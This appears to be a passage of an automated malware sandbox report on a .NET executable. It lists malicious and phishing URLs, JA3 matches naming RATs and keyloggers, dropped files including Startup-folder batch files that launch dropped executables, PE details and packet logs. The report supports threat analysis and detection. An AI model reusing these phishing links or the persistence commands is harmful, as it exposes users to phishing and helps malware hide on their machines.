                            https://johnsonjobs.com/redirect?payload=ZfV9OtmobR3i2ruZTvsMkA84kS3tYa7PZqgJLkMZweXlkfJDM0dutgProbkmt27rcbpxeWvTs3HxMljDFag_7vJKqir-gQJAelrJe1WbB9KRiSyODd6wJx-5yXKMQTnBn7tiNuKPI1dunp9DnBp7GEunwyDOJiK8YN_4BNRsK2zijfILLhPD53tsXwxaEy8k17QQvlGGzjiuexcKBWlZGFf7_lz_Eh5GEGVjoDEKV9EF3uF6yz5kV8Fl2T_jY-eL13Codz5IwIoBouG1saZLdLMQMGDWSf8_Mra9BkHCd4WvlF6dCgZTaa5qR4K0zIGlqHRKsnjcSO-L99Z8R-T2wwGFM6npdHMn-USVTOZvyoZaFfsnmPHqI7sHeRspjTe4CoBT4p9rBGWAWwd8hfFmxy2lF0M5iCdUvFK_d6EN8G5iauwRm26m4xjYQTZ3GYKttsCfs4awkWmjelWbNC5q0i_PzFjmTAfWFQMPwu4Zd-5xDCvfWAf40aD9o_yh0VyY1NWAa0P8WFd6-NHAjHPeafSddmmSmpIba94Rr-j4laK_S8AwvIWWl3zzjrwUK4ZyS1W6mvAw8VAoAI0bGz9Or4T951qAmYh0XJwt80_5j5AZug2Dh_YLKr41uSZ-7P3Uo-0xU9rvoCXccnIpUsnrQ4zqClgUM4PtN0ek6uZ5SqqFSPsgDd8XPUMNTLQxlTX43GxoIhIGxBTzMtFeIoKuWrFpZgSBlQZtUr0z3mrYjykkgGows5JZ9z18BKJUQL72jGmnyXpg1lN1QjZRBVYy8nbwbhTteZfungE_IDwvrJ-hXYvg4B9GRVWKVv2Wr1ZBUnEgmhoZC_ke_5eZ2tljtA._08z7B5MUY1dlX61RaRjcwGet hashmaliciousUnknownBrowse
                            • 104.18.95.41
                            https://ftsetset4.bukuyass.com/HBglGEQJOOPwKflKRFrRZsPFEoEszB&4cEQNrtCrpS&135151/381/loqbjtwlya.home.php?sq=1672-646&lk=267589-14&page=015Get hashmaliciousPhisherBrowse
                            • 104.21.61.175
                            PAYMENT_CONFIRMATION-(Witnesscarecom)AWSK.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                            • 104.21.26.150
                            https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com////amp/s/jbmagneticos.com.br/.dev/VGCU2YC1/c211bGxpbmdzQHRtaGNjLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                            • 104.18.94.41
                            http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                            • 172.67.210.92
                            https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413dGet hashmaliciousPhisherBrowse
                            • 104.17.25.14
                            https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413dGet hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            http://ceiam.esGet hashmaliciousUnknownBrowse
                            • 188.114.97.3
                            https://www.google.com/url?q=https://www.google.com/url?q%3DIrfT8NMLx6QPaJgv6Z3g%26rct%3DqsUbQmXhZ93d4gNXIWaR%26sa%3Dt%26esrc%3DEgJeLX8CAl11DNSW7pgH%26source%3D%26cd%3D9X3EYbyCMUoB46Jqpszn%26cad%3Dz64Ndl7J844jI5EH33et%26ved%3D36LRX1krI3rPMEZVSMU2%26uact%3D%2520%26url%3Damp%252Fsantanderconcepts%252Ecom%252F.lamb%252F&source=gmail&ust=1725986149001000&usg=AOvVaw1kdi6SPX1NGpGYFWhG_1Z7#NQvlKnUGFE-SURENICObWljaGFlbHNjb2ZpZWxkQGRpc25leS5jb20=Get hashmaliciousHTMLPhisherBrowse
                            • 1.1.1.1
                            https://johnsonjobs.com/redirect?payload=ZfV9OtmobR3i2ruZTvsMkA84kS3tYa7PZqgJLkMZweXlkfJDM0dutgProbkmt27rcbpxeWvTs3HxMljDFag_7vJKqir-gQJAelrJe1WbB9KRiSyODd6wJx-5yXKMQTnBn7tiNuKPI1dunp9DnBp7GEunwyDOJiK8YN_4BNRsK2zijfILLhPD53tsXwxaEy8k17QQvlGGzjiuexcKBWlZGFf7_lz_Eh5GEGVjoDEKV9EF3uF6yz5kV8Fl2T_jY-eL13Codz5IwIoBouG1saZLdLMQMGDWSf8_Mra9BkHCd4WvlF6dCgZTaa5qR4K0zIGlqHRKsnjcSO-L99Z8R-T2wwGFM6npdHMn-USVTOZvyoZaFfsnmPHqI7sHeRspjTe4CoBT4p9rBGWAWwd8hfFmxy2lF0M5iCdUvFK_d6EN8G5iauwRm26m4xjYQTZ3GYKttsCfs4awkWmjelWbNC5q0i_PzFjmTAfWFQMPwu4Zd-5xDCvfWAf40aD9o_yh0VyY1NWAa0P8WFd6-NHAjHPeafSddmmSmpIba94Rr-j4laK_S8AwvIWWl3zzjrwUK4ZyS1W6mvAw8VAoAI0bGz9Or4T951qAmYh0XJwt80_5j5AZug2Dh_YLKr41uSZ-7P3Uo-0xU9rvoCXccnIpUsnrQ4zqClgUM4PtN0ek6uZ5SqqFSPsgDd8XPUMNTLQxlTX43GxoIhIGxBTzMtFeIoKuWrFpZgSBlQZtUr0z3mrYjykkgGows5JZ9z18BKJUQL72jGmnyXpg1lN1QjZRBVYy8nbwbhTteZfungE_IDwvrJ-hXYvg4B9GRVWKVv2Wr1ZBUnEgmhoZC_ke_5eZ2tljtA._08z7B5MUY1dlX61RaRjcwGet hashmaliciousUnknownBrowse
                            • 104.18.95.41
                            https://ftsetset4.bukuyass.com/HBglGEQJOOPwKflKRFrRZsPFEoEszB&4cEQNrtCrpS&135151/381/loqbjtwlya.home.php?sq=1672-646&lk=267589-14&page=015Get hashmaliciousPhisherBrowse
                            • 104.21.61.175
                            PAYMENT_CONFIRMATION-(Witnesscarecom)AWSK.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0ePAYMENT_CONFIRMATION-(Witnesscarecom)AWSK.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            https://u46709706.ct.sendgrid.net/ls/click?upn=u001.DKwEP7VZOQzO0CdL8oA-2F1XfRWjdnnJf8AzT08E2sLXTgMdD9Jn8frnIecLny3eAokPJfihouroN0Bfpu-2Fc6LnrjqjViS2pLM6S7dZHOEwpuLfW-2BIU7dEMYGgaqQi-2B7ZF0pXBlOGA-2BSPzvia0EbhuUQ-3D-3D_2_r_uaJJRFhr-2BcMTvUL7itRYOkOTFwa3yBQ-2Be5ivdH2VumIL8X-2BH-2Fbr48QmarAca3fouHSsMOxgbLM7p2wkFK-2FUQL6-2FE9yCCxVee50mxUV1yVgD0jP9rXVSjBZFhWzNsNI0r917tCy3Siqu3AuAzm4HWroH5uBBAEhWW2PKqu-2B5XjabsjUwJhDJYiuP7NzEfnzrbkWW2CLIJbYvjD7vD7au-2BFw-3D-3DGet hashmaliciousPhisherBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            Update.jsGet hashmaliciousNetSupport RATBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            SecuriteInfo.com.BackDoor.AgentTeslaNET.34.20128.22369.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            Invoice Request.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bva%C2%ADnd%C2%ADat%C2%ADco%E2%80%8B.%C2%ADv%C2%ADn/.dev/ChZuQF9L/bHlubi5wYXJzb25zQGltYWdvLmNvbW11bml0eQ===$%E3%80%82Get hashmaliciousHTMLPhisherBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            doc_Zapytanie - Oferta KH 09281.com.exeGet hashmaliciousQuasarBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            https://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/298cfa06-ad24-42db-8a85-7a3ca069b2cf?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyuGet hashmaliciousHTMLPhisherBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57
                            https://dl9r8y25t98wv.cloudfront.net/?YS50YW5ndXlAc2JtLm1jGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            • 188.114.97.3
                            • 104.21.76.57

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\FUtH9YITjAWMFeQjQQ7DRSix.exe

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                            Category:dropped
                            Size (bytes):7462
                            Entropy (8bit):5.420482116403958
                            Encrypted:false
                            SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                            MD5:77F762F953163D7639DFF697104E1470
                            SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                            SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                            SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                            Malicious:false
                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1216
                            Entropy (8bit):5.34331486778365
                            Encrypted:false
                            SSDEEP:24:MLU84qpE4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4j:Mgv2HKlYHKh3oIHKx1qHitHo6hAHKzea
                            MD5:FB53815DEEC334028DBDE4E3660E26D0
                            SHA1:7F491359EC244406DFC8AA39FC9B727D677E4FDF
                            SHA-256:C3EC8D6C079B1940D82374A85E9DC41ED9FF683ADA338F89E375AA7AC777749D
                            SHA-512:5CC466901D7911BE1E1731162CC01C371444AAFA9A504F1F22516F60C888048EB78B5C5A12215EE2B127BD67A19677E370686465E85E08BC14015F8FAB049E49
                            Malicious:true
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                            C:\Users\user\AppData\Local\O9eYcIOmtMzXKWtuQMaDYhYu.exe

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                            Category:dropped
                            Size (bytes):7462
                            Entropy (8bit):5.420482116403958
                            Encrypted:false
                            SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                            MD5:77F762F953163D7639DFF697104E1470
                            SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                            SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                            SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                            Malicious:false
                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lkpj4eLKYuRL6LrNltOgK200.bat

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):69
                            Entropy (8bit):4.811049276555988
                            Encrypted:false
                            SSDEEP:3:Ljn9m1s8pE2J5jkAUA0M0zCln:fE1sZ23nt0Q
                            MD5:BCBCE21828BA12B4E2D4089D6D56FB2C
                            SHA1:7C299560545D1F37C7C2A544B8102CFA9F524B91
                            SHA-256:69FA8CAC49DCBAEF87C877D1B70CDBC489DAD2C65E4CD93B1F55954844522F83
                            SHA-512:3AD523DA9645E6465EBA47F7236A4E6860681E69B5E746B45FB593408BF5C6BCB33F4812182FE5A427B5C4E408D35B168FA221D4D7EFF3CB4554BD4A52A4087B
                            Malicious:true
                            Preview:start "" "C:\Users\user\AppData\Local\FUtH9YITjAWMFeQjQQ7DRSix.exe"

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Volrhw1xPk7ixUGFUQh9lCFk.bat

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):69
                            Entropy (8bit):4.753684696555501
                            Encrypted:false
                            SSDEEP:3:Ljn9m1s8pE2J5qS+80oE28Q0s:fE1sZ23qS+lo7is
                            MD5:92350C352FC278F9614A4AC0FB5D1ED7
                            SHA1:1C69CBB9CBD7FBC9ED39391E13E3DEFC6DA48351
                            SHA-256:841BB82F7C519D7E5F18385BAB831DA56F21128D8E2A8090DF587A2B1709D418
                            SHA-512:2B8B4EF4C02B1FDACD9B552B1B64E5D517F9C3AD9C3E471384B695C2AA4B70C4B402F8799FCCAE461AFA25E3D8B28ED4B72D597B0F0D84514A0C306218D1034C
                            Malicious:true
                            Preview:start "" "C:\Users\user\AppData\Local\O9eYcIOmtMzXKWtuQMaDYhYu.exe"

                            C:\Users\user\Pictures\VUrXgpTqluCxhgE6UCHkYL66.exe

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                            Category:dropped
                            Size (bytes):7462
                            Entropy (8bit):5.420482116403958
                            Encrypted:false
                            SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                            MD5:77F762F953163D7639DFF697104E1470
                            SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                            SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                            SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                            Malicious:false
                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                            C:\Users\user\Pictures\whUHN2pww65ZtjYEzLyUMEnE.exe

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                            Category:dropped
                            Size (bytes):7462
                            Entropy (8bit):5.420482116403958
                            Encrypted:false
                            SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                            MD5:77F762F953163D7639DFF697104E1470
                            SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                            SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                            SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                            Malicious:false
                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

                            C:\Windows\appcompat\Programs\Amcache.hve

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.29844567951361
                            Encrypted:false
                            SSDEEP:6144:oECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lQSD6VJSR1o:NCsL6seqD5SZSWVARm
                            MD5:4F772D99D75C62C410222EB93719C9DE
                            SHA1:244874889CACA3029325786EDF11B0A781054558
                            SHA-256:6B0EEEE69CF0AFA817C65ECE8161D51B71FD940475E53F3061F880E73D7CD2BA
                            SHA-512:916FF0F6C78504838C6E4DBDFFAA3BBBA022C4FD5BD9546BB6517F9815A341B86191D9C409EE4AFCED2C0BE97684BD643DE0BE9477893D22C31A327AC9D90E4F
                            Malicious:false
                            Preview:regfE...E....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm6k.l.................................................................................................................................................................................................................................................................................................................................................b.X........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.505123268062248
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:file.exe
                            File size:951'808 bytes
                            MD5:6d42583de8cb7222d51b9e5976ab2ed2
                            SHA1:800f8bbcc6730f06f9bb9f2431b48ac7c0385fce
                            SHA256:13de95a8a6ab504e0060485cc8eaab56531aa1b1a9e567d722774e15ea126640
                            SHA512:88252adbf63b1a76f18606008c23b96537f5d2f07d84df1b8d67dfa4a1bb110b2433038f5dbd0f9d915ea11e573d7135876b95cabddf8d3c6f78a4423a2fefb0
                            SSDEEP:12288:YIsRcP1Ai09bpspcAqHz+qLPOek+V5g/u4LHHMMjrxQo8LMsaEIux8U+lBkZOcm9:0Rc92psKAq6ITV5vGbao8LSEI28
                            TLSH:1E158C406BE81954F3FB2BB99FB998468A3BF8E15872C66E013055DE0632F81CD61737
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pX.@.................~............... ........@.. ....................................`................................

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0x4e9d0e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x40A05870 [Tue May 11 04:37:04 2004 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xe9cc00x4b.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x3f8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000xe7d140xe7e004055e0f1aa58effafc62b0a836a97b23False0.7871820249326146data7.511723040802468IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xea0000x3f80x4007c38f3e1a963465f9aec4e4fb51fd88aFalse0.4267578125data3.4719177119668405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xec0000xc0x200e89c9d12b0bcd9c6194cd5f085c4d57fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0xea0580x3a0data0.4396551724137931

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 10, 2024 18:20:58.814404964 CEST49711443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:20:58.814450979 CEST44349711104.20.3.235192.168.2.11
                            Sep 10, 2024 18:20:58.814515114 CEST49711443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:20:58.822427988 CEST49711443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:20:58.822448969 CEST44349711104.20.3.235192.168.2.11
                            Sep 10, 2024 18:20:59.304081917 CEST44349711104.20.3.235192.168.2.11
                            Sep 10, 2024 18:20:59.304160118 CEST49711443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:20:59.307420969 CEST49711443192.168.2.11104.20.3.235
                            Sep 10, 2024 18:20:59.307429075 CEST44349711104.20.3.235192.168.2.11
